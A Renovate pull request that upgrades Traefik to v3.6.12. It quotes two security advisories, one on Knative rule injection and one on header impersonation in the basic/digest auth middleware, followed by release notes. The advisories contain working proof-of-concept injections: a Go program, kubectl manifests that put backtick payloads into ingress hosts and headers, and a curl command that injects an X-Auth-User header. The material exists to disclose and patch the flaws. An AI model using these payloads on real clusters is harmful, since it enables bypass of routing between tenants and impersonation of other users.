Update module github.com/traefik/traefik/v3 to v3.6.12 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
github.com/traefik/traefik/v3	v3.6.4 → v3.6.12

GitHub Vulnerability Alerts

CVE-2026-32695

Summary

There is a potential vulnerability in Traefik's Kubernetes Knative, Ingress, and Ingress-NGINX providers related to rule injection.

User-controlled values are interpolated into backtick-delimited Traefik router rule expressions without escaping or validation. A malicious value containing a backtick can terminate the literal and inject additional operators into Traefik's rule language, altering the parsed rule tree. In shared or multi-tenant deployments, this can bypass host and header routing constraints and redirect unauthorized traffic to victim services.

Patches

• https://github.com/traefik/traefik/releases/tag/v3.6.11
• https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2

For more information

If there are any questions or comments about this advisory, please open an issue.

Original Description

Summary

Traefik's Knative provider builds router rules by interpolating user-controlled values into backtick-delimited rule expressions without escaping. In live cluster validation, Knative rules[].hosts[] was exploitable for host restriction bypass (for example tenant.example.com) || Host(attacker.com), producing a router that serves attacker-controlled hosts. Knative headers[].exact also allows rule-syntax injection and proves unsafe rule construction. In multi-tenant clusters, this can route unauthorized traffic to victim services and lead to cross-tenant traffic exposure. Severity is High in shared deployments.

Tested on Traefik v3.6.10; the vulnerable pattern appears to have been present since the Knative provider was introduced. Earlier versions with Knative provider support are expected to be affected.

Details

The issue is caused by unsafe rule-string construction using fmt.Sprintf with backtick-delimited literals.

Incriminated code patterns:

• pkg/provider/kubernetes/knative/kubernetes.go

  • fmt.Sprintf("Host(%v)", host)
  • fmt.Sprintf("Header(%s,%s)", key, headers[key].Exact)
  • fmt.Sprintf("PathPrefix(%s)", path)

• pkg/provider/kubernetes/ingress/kubernetes.go

  • fmt.Sprintf("Host(%s)", host)
  • fmt.Sprintf("(Path(%[1]s) || PathPrefix(%[1]s/))", path)

• pkg/provider/kubernetes/ingress-nginx/kubernetes.go (hardening candidate; not the primary confirmed vector in this report)

  • fmt.Sprintf("Header(%s, %s)", c.Header, c.HeaderValue)
  • related host/path/header concatenations with backticks

Because inputs are inserted directly into rule expressions, a malicious value containing a backtick can terminate the literal and inject additional operators/tokens in Traefik's rule language. Example payload:

• x) || Host(attacker.com

When used as a header value in Knative rule construction, the resulting rule contains:

• Header(X-Poc,x) || Host(attacker.com)

This alters rule semantics and enables injection into Traefik's rule language. Depending on the field used (hosts[] vs headers[].exact) this can become a direct routing bypass.

Important scope note:

• Gateway API code path (pkg/provider/kubernetes/gateway/httproute.go) already uses safer %q formatting for header/query rules and is not affected by this exact pattern.
• For standard Kubernetes Ingress, spec.rules.host is validated as DNS-1123 by the API server, which rejects backticks (so this specific host-injection payload is typically blocked).
• For Knative Ingress, rules[].hosts[] and headers[].exact are typed as string in CRD schema with no pattern constraint.
• In this validation environment, rules[].hosts[] was accepted and produced a practical host bypass. headers[].exact was also accepted and produced rule-syntax injection in generated routers.
• Ingress-NGINX patterns are included as follow-up hardening targets and are not claimed as independently exploitable here.
• Exploitability depends on admission/validation policy and who can create these resources.

PoC

1. Local deterministic PoC (no cluster required):

• Run:
  • Save the inline PoC below as poc_build_rule.go
  • Run go run poc_build_rule.go
• Observe output:
  • Legitimate rule: (Host(tenant.example.com)) && (Header(X-API-Key,secret123)) && PathPrefix(/)
  • Malicious rule: (Host(tenant.example.com)) && (Header(X-API-Key,x) || Host(attacker.com)) && PathPrefix(/)
• This proves syntax injection in current string-construction logic.

Inline PoC code (self-contained):

package main

import (
	"fmt"
	"sort"
	"strings"
)

func buildRuleKnative(hosts []string, headers map[string]struct{ Exact string }, path string) string {
	var operands []string

	if len(hosts) > 0 {
		var hostRules []string
		for _, host := range hosts {
			hostRules = append(hostRules, fmt.Sprintf("Host(`%v`)", host))
		}
		operands = append(operands, fmt.Sprintf("(%s)", strings.Join(hostRules, " || ")))
	}

	if len(headers) > 0 {
		headerKeys := make([]string, 0, len(headers))
		for k := range headers {
			headerKeys = append(headerKeys, k)
		}
		sort.Strings(headerKeys)

		var headerRules []string
		for _, key := range headerKeys {
			headerRules = append(headerRules, fmt.Sprintf("Header(`%s`,`%s`)", key, headers[key].Exact))
		}
		operands = append(operands, fmt.Sprintf("(%s)", strings.Join(headerRules, " && ")))
	}

	if len(path) > 0 {
		operands = append(operands, fmt.Sprintf("PathPrefix(`%s`)", path))
	}

	return strings.Join(operands, " && ")
}

func main() {
	legitHeaders := map[string]struct{ Exact string }{
		"X-API-Key": {Exact: "secret123"},
	}
	fmt.Println(buildRuleKnative([]string{"tenant.example.com"}, legitHeaders, "/"))

	maliciousHeaders := map[string]struct{ Exact string }{
		"X-API-Key": {Exact: "x`) || Host(`attacker.com"},
	}
	fmt.Println(buildRuleKnative([]string{"tenant.example.com"}, maliciousHeaders, "/"))

	// Safe variant example (Gateway-style):
	fmt.Println(fmt.Sprintf("Header(%q,%q)", "X-API-Key", "x`) || Host(`attacker.com"))
}

2. Cluster PoC (Knative host injection, primary / practical bypass):

• Preconditions:
  • Kubernetes test cluster with Knative Serving.
  • Traefik configured with Knative provider.
• Apply manifest:
  • kubectl apply -f - <<'YAML'

apiVersion: networking.internal.knative.dev/v1alpha1
kind: Ingress
metadata:
  name: poc-host-injection
  namespace: default
  annotations:
    # This exact key worked in live validation:
    networking.knative.dev/ingress.class: "traefik.ingress.networking.knative.dev"
spec:
  rules:
    - hosts:
        - 'tenant.example.com`) || Host(`attacker.com'
      visibility: External
      http:
        paths:
          - path: "/"
            splits:
              - percent: 100
                serviceName: dummy
                serviceNamespace: default
                servicePort: 80
YAML

• (If API version mismatch, adjust between networking.internal.knative.dev/v1alpha1 and networking.knative.dev/v1alpha1.)
• Verify:
  • Check Traefik router rule contains: (Host(tenant.example.com) || Host(attacker.com)) && PathPrefix(/).
  • Request with Host: attacker.com returns backend 200.
  • This demonstrates host restriction bypass in practice.

3. Cluster PoC (Knative header injection, confirms rule-syntax injection):

• Apply:
  • kubectl apply -f - <<'YAML'

apiVersion: networking.internal.knative.dev/v1alpha1
kind: Ingress
metadata:
  name: poc-rule-injection
  namespace: default
  annotations:
    networking.knative.dev/ingress.class: "traefik.ingress.networking.knative.dev"
spec:
  rules:
    - hosts:
        - "tenant.example.com"
      visibility: External
      http:
        paths:
          - path: "/"
            headers:
              X-Poc:
                exact: 'x`) || Host(`attacker.com'
            splits:
              - percent: 100
                serviceName: dummy
                serviceNamespace: default
                servicePort: 80
YAML

• Verify:
  • Inspect generated Traefik dynamic router rule (API/dashboard/logs).
  • Confirm injected fragment || Host(attacker.com) is present.
  • Send request with Host: attacker.com and no expected tenant header (expected: 404 for this payload shape, because leading Host(tenant) still applies).
  • Send request with Host: tenant.example.com and X-Poc: x (expected: 200 from backend).

4. Optional Ingress PoC (scope check):

• Apply:
  • kubectl apply -f - <<'YAML'

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: poc-ingress-host-injection
  namespace: default
  annotations:
    kubernetes.io/ingress.class: traefik
spec:
  rules:
    - host: 'tenant.example.com`) || Host(`attacker.com'
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: dummy
                port:
                  number: 80
YAML

• Expected in most clusters: API server rejects this payload because Ingress host must satisfy DNS-1123.
• Keep this step only as a negative control to demonstrate the distinction between native Ingress validation and Knative CRD behavior.

Validation executed in this report:

• Local deterministic PoC executed with go run and output matched expected injected rule.
• Live cluster test executed on local kind cluster (kind-traefik-poc) with Traefik v3.6.10 and Knative Serving CRDs.
• Annotation key confirmed in this environment: networking.knative.dev/ingress.class (dot). The hyphen variant was not used by the successful processing path.
• Traefik API/logs confirmed generated routers included injected expressions.
• Live HTTP request with Host: attacker.com reached backend (200) for Knative host-injection payload.

Impact

• Vulnerability type: Rule injection / authorization bypass at routing layer.
• Primary impact: Bypass of intended routing predicates (host/header/path), enabling unauthorized routing to protected services.
• Who is impacted: Primarily deployments using Traefik Knative provider where untrusted or semi-trusted actors can create/update Knative Ingress resources (typical in multi-tenant clusters, shared namespaces, or weak admission controls). Standard Kubernetes Ingress host injection is usually blocked by API validation.
• Security consequences: Cross-tenant traffic access, internal service exposure, policy bypass, and potential chaining with app-level vulnerabilities.

CVE-2026-33433

Summary

There is a potential vulnerability in Traefik's Basic and Digest authentication middlewares when headerField is configured with a non-canonical HTTP header name.

An authenticated attacker with valid credentials can inject the canonical version of the configured header to impersonate any identity to the backend. Because Traefik writes the authenticated username using a non-canonical map key, it creates a separate header entry rather than overwriting the attacker's canonical one — causing most backend frameworks to read the attacker-controlled value instead.

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.42
• https://github.com/traefik/traefik/releases/tag/v3.6.12
• https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.3

For more information

If there are any questions or comments about this advisory, please open an issue.

---

Original Description

Summary

When headerField is configured with a non-canonical HTTP header name (e.g., x-auth-user instead of X-Auth-User), an authenticated attacker can inject a canonical version of that header to impersonate any identity to the backend. The backend receives two header entries — the attacker-injected canonical one is read first, overriding Traefik's non-canonical write.

Tested on Traefik v3.6.10.

Details

At pkg/middlewares/auth/basic_auth.go:92, the authenticated username is written using direct map assignment:

req.Header[b.headerField] = []string{user}

Go's http.Header map is keyed by canonical names (e.g., X-Auth-User). Direct assignment with a non-canonical key (x-auth-user) creates a separate map entry from any canonical-key entry already present. The attacker's X-Auth-User: superadmin occupies the canonical slot and is never overwritten by Traefik's non-canonical write.

The same bug exists in pkg/middlewares/auth/digest_auth.go:100. Notably, forward.go:254 correctly uses http.CanonicalHeaderKey(), showing the fix pattern already exists in the codebase.

PoC

Traefik config (YAML, Docker labels, or REST API):

middlewares:
  auth:
    basicAuth:
      users: ["admin:$2y$05$..."]
      headerField: "x-auth-user"

Normal request (baseline):

curl -u admin:admin http://traefik/secure/test

# Backend receives: x-auth-user: admin
# Identity = admin ✓

Attack request:

curl -u admin:admin -H "X-Auth-User: superadmin" http://traefik/secure/test

# Backend receives BOTH headers:
#   X-Auth-User: superadmin   ← attacker-injected (canonical key, read first by most frameworks)

#   x-auth-user: admin        ← Traefik-set (non-canonical, ignored by most frameworks)
# Identity seen by backend = superadmin ✗

Control test — when headerField uses canonical casing (X-Auth-User), the attack fails. Traefik's write correctly overwrites the attacker's header.

This is realistic because YAML conventions favor lowercase keys, Traefik docs don't warn about canonicalization, and the pattern of backends trusting the headerField header is recommended in Traefik's own documentation.

Fix suggestion:

// basic_auth.go:92 and digest_auth.go:100 — change:
req.Header[b.headerField] = []string{user}
// to:
req.Header.Set(b.headerField, user)

Also strip any incoming headerField header before the auth check with req.Header.Del(b.headerField).

Impact

An authenticated attacker with valid credentials (even low-privilege) can impersonate any other user identity to backend services. If backends use the headerField header for authorization decisions (which is the intended use case per Traefik docs), this enables privilege escalation — e.g., a regular user impersonating an admin.

The attack requires the operator to configure headerField with a non-canonical header name, which is the natural thing to do in YAML and is not warned against in documentation.

---

Release Notes

traefik/traefik (github.com/traefik/traefik/v3)

v3.6.12

Compare Source

All Commits

Bug fixes:

• [k8s/ingress-nginx] Fix auth-response-headers whitespace trimming in ingress-nginx provider (#​12856 @​mmatur)
• [acme] Bump github.com/go-acme/lego/v4 to v4.33.0 (#​12840 @​ldez)
• [server] Fix comment and unnecessary allocation in withRoutingPath (#​12880 @​boinger)
• [server, tcp] Fix postgres STARTTLS with TLS termination (#​12847 @​mmatur)
• [api] Fix allow colons and tildes in api.basePath validation (#​12857 @​mmatur)
• [grpc] Bump google.golang.org/grpc to v1.79.3 (#​12845 @​mmatur)
• [middleware, authentication] Prevent duplicate user headers in basic and digest auth middleware (#​12851 @​juliens)
• [middleware] Fix StripPrefix and StripPrefixRegex to slice the prefix using encoded prefix length (#​12863 @​gndz07)

Documentation:

• [acme] Clarify CNAME explanation in ACME Documentation (#​12818 @​sheddy-traefik)
• [k8s/ingress-nginx] Add ingress-nginx migration banner on documentation pages (#​12872 @​gndz07)
• [k8s/ingress-nginx] Clarify that NGINX Ingress watchNamespace watches only one namespace (#​12873 @​parkerfath)
• [k8s/ingress] Improve Kubernetes Ingress Routing Documentation (#​12876 @​sheddy-traefik)

v3.6.11

Compare Source

All Commits

Bug fixes:

• [logs, otel] Add OTel-conformant trace context attributes to access logs (#​12801 @​mmatur)
• [k8s/gatewayapi] Fix incorrect hostname matching between listener and route (#​12599 @​TheColorman)
• [k8s/ingress] Fix ingress router's rule (#​12808 @​gndz07)
• [webui] Remove AGPL license in code (#​12799 @​Desel72)
• [k8s/ingress-nginx] Fix proxy-ssl-verify annotation (#​12825 @​LBF38)
• [http] Add maxResponseBodySize configuration on HTTP provider (#​12788 @​gndz07)
• [tls] Support fragmented TLS client hello (#​12787 @​rtribotte)
• [middleware, authentication] Make basic auth check timing constant (#​12803 @​rtribotte)

Documentation:

• [k8s] Improve the multi tenant security note (#​12822 @​nmengin)
• Fix unnecessary escaping of pipe in regexp examples (#​12784 @​diegmonti)
• Add vulnerability submission quality guidelines (#​12807 @​emilevauge)
• Fix start up message format (#​12806 @​mloiseleur)
• Remove unsupported servers[n].address from TCP label examples (#​12817 @​sheddy-traefik)
• Bump mkdocs-traefiklabs to use consent mode (#​12804 @​darkweaver87)

v3.6.10

Compare Source

All Commits

Bug fixes:

• [docker] Bump Docker and OpenTelemetry dependencies (#​12761 by mmatur)
• [fastproxy] Bump github.com/valyala/fasthttp to v1.69.0 (#​12763 by kevinpollet)
• [healthcheck, grpc] Remove path parsing with grpc healthcheck (#​12760 by rtribotte)
• [k8s/gatewayapi] Fix Gateway API router's rules (#​12753 by rtribotte)
• [middleware] Fix HasSecureHeadersDefined returning false when stsSeconds is 0 (#​12684 by veeceey)
• [otel] Bump go.opentelemetry.io/otel dependencies (#​12754 by rtribotte)
• [server] Bump golang.org/x/net to v0.51.0 (#​12756 by kevinpollet)
• [webui] Fix priority display in dashboard and ACME bypass redirect (#​12740 by mmatur)
• [webui] Fix basePath validation for dashboard template (#​12729 by gndz07)

Documentation:

• [middleware] Correct documentation for Digest auth (#​12651 by Zash)
• Add missing .http to TOML table names (#​12713 by Darsstar)
• Fix incorrect TOML example in entrypoints docs (#​12711 by mfmfuyu)
• Fix API basepath option documentation (#​12744 by nmengin)

v3.6.9

Compare Source

All Commits

Bug fixes:

• [acme] Bump github.com/go-acme/lego/v4 to v4.32.0 (#​12702 by ldez)
• [middleware] Fix case sensitivity on x-forwarded headers for Connection (#​12690 by LBF38)
• [middleware, authentication] Handle empty/missing User-Agent header (#​12545 by a-stangl)
• [middleware, authentication] Add maxResponseBodySize configuration to forwardAuth middleware (#​12694 by gndz07)
• [server] Fix TLS handshake error handling (#​12692 by juliens)

Documentation:

• [docker] Update docker in-depth setup guide (#​12682 by mdevino)
• [k8s] Make labelSelector option casing more consistent (#​12658 by holysoles)
• [k8s/ingress-nginx] Add temporary note to advertise the incoming NGINX annotations (#​12699 by nmengin)
• Increased content width in documentation (#​12632 by tobiasge)
• Correct encoded characters allowance in entrypoints.md (#​12679 by Apflkuacha)

v3.6.8

Compare Source

All Commits

Bug fixes:

• [acme] Remove invalid private key in log (#​12574 by juliens)
• [acme] Alter TLS renewal period (#​12479 by LtHummus)
• [healthcheck] Reject absolute URL in healthcheck path configuration (#​12653 by rtribotte)
• [http3] Bump github.com/quic-go/quic-go to v0.59.0 (#​12553 by jnoordsij)
• [metrics,tracing,accesslogs] Fix ObservabilityConfig SetDefaults (#​12636 by mmatur)
• [server] Remove conn deadline after STARTTLS negociation (#​12639 by rtribotte)
• [tls] Fix verifyServerCertMatchesURI function behavior (#​12575 by kevinpollet)
• [tracing,otel] Use ParentBased sampler to respect parent span sampling decision (#​12403 by xe-leon)
• [webui] Use url.Parse to validate X-Forwarded-Prefix value (#​12643 by kevinpollet)
• [healthcheck] Validate healthcheck path configuration (#​12642 by @​rtribotte)
• [tls, server] Cap TLS record length to RFC 8446 limit in ClientHello peeking (#​12638 by @​mmatur)
• [service] Avoid recursion with services (#​12591 by juliens)
• [webui] Bump dependencies of documentation and webui (#​12581 by gndz07)

Documentation:

• [k8s] Fix kubernetes.md with correct http redirections (#​12603 by MartenM)
• [middleware,k8s/crd] Fix the errors middleware's document for Kubernetes CRD (#​12600 by yuito-it)
• [tls] Clarify SNI selection (#​12482 by AnuragEkkati)
• Fix typo on JWT documentation (#​12616 by mdevino)
• Add @​gndz07 as a current maintainer (#​12594 by emilevauge)
• Remove extraneous dots in migration guide (#​12571 by dathbe)
• Document Path matcher placeholder removal in v3 migration guide (#​12570 by sheddy-traefik)
• Improve Service Reference page (#​12541 by sheddy-traefik)
• Document negative priority support for routers (#​12505 by understood-the-assignment)
• Improve the structure of the routing reference pages (#​12429 by sheddy-traefik)
• Clean Up Menu Entries & Update Expose Overview (#​12405 by sheddy-traefik)
• Split Expose User Guides & Add Multi-Layer Routing Section (#​12238 by sheddy-traefik)
• Remove extra dots in migration guide (#​12573 by rtribotte)

Misc:

• Merge v2.11 into v3.6 (#​12652 by mmatur)
• Merge v2.11 into v3.6 (#​12644 by mmatur)
• Merge branch v2.11 into v3.6 (#​12617 by mmatur)
• Merge v2.11 into v3.6 (#​12605 by mmatur)
• Merge v2.11 into v3.6 (#​12601 by mmatur)
• Merge branch v2.11 into v3.6 (#​12556 by mmatur)

v3.6.7

Compare Source

All Commits

Bug fixes:

• [acme] Remove invalid private key in log (#​12574 by juliens)
• [acme] Alter TLS renewal period (#​12479 by LtHummus)
• [healthcheck] Reject absolute URL in healthcheck path configuration (#​12653 by rtribotte)
• [http3] Bump github.com/quic-go/quic-go to v0.59.0 (#​12553 by jnoordsij)
• [metrics,tracing,accesslogs] Fix ObservabilityConfig SetDefaults (#​12636 by mmatur)
• [server] Remove conn deadline after STARTTLS negociation (#​12639 by rtribotte)
• [tls] Fix verifyServerCertMatchesURI function behavior (#​12575 by kevinpollet)
• [tracing,otel] Use ParentBased sampler to respect parent span sampling decision (#​12403 by xe-leon)
• [webui] Use url.Parse to validate X-Forwarded-Prefix value (#​12643 by kevinpollet)
• [healthcheck] Validate healthcheck path configuration (#​12642 by @​rtribotte)
• [tls, server] Cap TLS record length to RFC 8446 limit in ClientHello peeking (#​12638 by @​mmatur)
• [service] Avoid recursion with services (#​12591 by juliens)
• [webui] Bump dependencies of documentation and webui (#​12581 by gndz07)

Documentation:

• [k8s] Fix kubernetes.md with correct http redirections (#​12603 by MartenM)
• [middleware,k8s/crd] Fix the errors middleware's document for Kubernetes CRD (#​12600 by yuito-it)
• [tls] Clarify SNI selection (#​12482 by AnuragEkkati)
• Fix typo on JWT documentation (#​12616 by mdevino)
• Add @​gndz07 as a current maintainer (#​12594 by emilevauge)
• Remove extraneous dots in migration guide (#​12571 by dathbe)
• Document Path matcher placeholder removal in v3 migration guide (#​12570 by sheddy-traefik)
• Improve Service Reference page (#​12541 by sheddy-traefik)
• Document negative priority support for routers (#​12505 by understood-the-assignment)
• Improve the structure of the routing reference pages (#​12429 by sheddy-traefik)
• Clean Up Menu Entries & Update Expose Overview (#​12405 by sheddy-traefik)
• Split Expose User Guides & Add Multi-Layer Routing Section (#​12238 by sheddy-traefik)
• Remove extra dots in migration guide (#​12573 by rtribotte)

Misc:

• Merge v2.11 into v3.6 (#​12652 by mmatur)
• Merge v2.11 into v3.6 (#​12644 by mmatur)
• Merge branch v2.11 into v3.6 (#​12617 by mmatur)
• Merge v2.11 into v3.6 (#​12605 by mmatur)
• Merge v2.11 into v3.6 (#​12601 by mmatur)
• Merge branch v2.11 into v3.6 (#​12556 by mmatur)

v3.6.6

Compare Source

All Commits

Bug fixes:

• [acme] Bump github.com/go-acme/lego/v4 to v4.31.0 (#​12529 by ldez)
• [acme] Add missing renew options (#​12467 by ldez)
• [acme] Replace hardcoded references to LetsEncrypt in log messages (#​12464 by schildbach)
• [k8s/ingress-nginx] Fix use-regex nginx annotation (#​12531 by LBF38)
• [k8s/ingress-nginx] Prevent Ingress Nginx provider http router to attach to an entrypoint with TLS (#​12528 by rtribotte)
• [k8s/ingress] Fix panic for empty defaultBackend and defaultBackend without resources (#​12509 by gndz07)
• [k8s] Fix condition used for serving and fenced endpoints (#​12521 by LBF38)
• [webui] Validate X-Forwarded-Prefix value for dashboard redirect (#​12514 by LBF38)
• [acme] Add timeout to ACME-TLS/1 challenge handshake (#​12516 by LBF38)
• [server] Make encoded character options opt-in (#​12540 by gndz07)

Documentation:

• [docker/swarm] Update swarm.md traefik version (#​12508 by DBouraoui)
• [k8s/ingress-nginx] Fix ingress-nginx annotations documentation (#​12510 by nmengin)
• [k8s] Fix Kubernetes reference yml file (#​12406 by mmatur)
• Fix code copy button positioning (#​12520 by AnuragEkkati)
• Fix typo in kubernetes.md (#​12515 by EdwardSalkeld)
• Bring back security section on API & Dashboard documentation page (#​12507 by gndz07)
• Fix link description in Traefik Proxy documentation (#​12488 by schaerfo)
• Add product comparison matrix and features page (#​12037 by sheddy-traefik)

Misc:

• Merge branch v2.11 into v3.6 (#​12552 by rtribotte)
• Merge branch v2.11 into v3.6 (#​12533 by mmatur)
• Merge branch v2.11 into v3.6 (#​12497 by mmatur)

v3.6.5

Compare Source

All Commits

Bug fixes:

• [acme] Bump github.com/go-acme/lego/v4 to v4.30.1 (#​12432 by ldez)
• [http3] Bump github.com/quic-go/quic-go to v0.58.0 (#​12448 by GreyXor)
• [redis] Fix mutually exclusive verification for Redis (#​12442 by juliens)
• [server] Fix deny encoded characters (#​12454 by rtribotte)

Documentation:

• [k8s/ingress,k8s] Fix Kubernetes Ingress provider documentation (#​12443 by nmengin)
• [k8s/ingress-nginx] Add RBAC documentation for Ingress NGINX provider (#​12445 by nmn3m)
• [k8s] Improve the K8S multi-tenancy security note (#​12444 by nmengin)
• Restore documentation on http.maxHeaderBytes (#​12440 by mloiseleur)
• Fix Menu Item Naming (#​12431 by sheddy-traefik)

Misc:

• Merge branch v2.11 into v3.6 (#​12475 by mmatur)
• Merge branch v2.11 into v3.6 (#​12438 by kevinpollet)

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 16 additional dependencies were updated

Details:

Package	Change
github.com/go-acme/lego/v4	v4.31.0 -> v4.33.0
github.com/grpc-ecosystem/grpc-gateway/v2	v2.27.8 -> v2.28.0
go.opentelemetry.io/otel	v1.40.0 -> v1.41.0
go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc	v0.16.0 -> v0.17.0
go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploghttp	v0.16.0 -> v0.17.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace	v1.40.0 -> v1.41.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc	v1.40.0 -> v1.41.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp	v1.40.0 -> v1.41.0
go.opentelemetry.io/otel/log	v0.16.0 -> v0.17.0
go.opentelemetry.io/otel/metric	v1.40.0 -> v1.41.0
go.opentelemetry.io/otel/sdk	v1.40.0 -> v1.41.0
go.opentelemetry.io/otel/sdk/log	v0.16.0 -> v0.17.0
go.opentelemetry.io/otel/trace	v1.40.0 -> v1.41.0
go.yaml.in/yaml/v2	v2.4.2 -> v2.4.3
google.golang.org/grpc	v1.79.0 -> v1.79.3
golang.org/x/net	v0.50.0 -> v0.51.0